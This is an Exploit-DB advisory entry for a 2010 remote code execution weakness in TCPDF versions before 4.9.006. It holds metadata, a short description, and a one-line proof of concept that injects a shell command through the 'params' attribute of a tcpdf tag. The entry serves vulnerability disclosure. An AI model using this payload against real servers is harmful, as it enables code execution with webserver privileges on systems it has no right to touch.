TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution

EDB-ID:

33826

CVE:

N/A


Author:

apoc

Type:

remote


Platform:

Linux

Date:

2010-04-08


source: https://www.securityfocus.com/bid/39315/info

TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code.

An attacker can exploit this issue in conjunction with other latent vulnerabilities to execute arbitrary code with the privileges of the webserver.

Versions prior to TCPDF 4.9.006 are vulnerable. 

<tcpdf method="Rect" params=");echo `id`;die(" />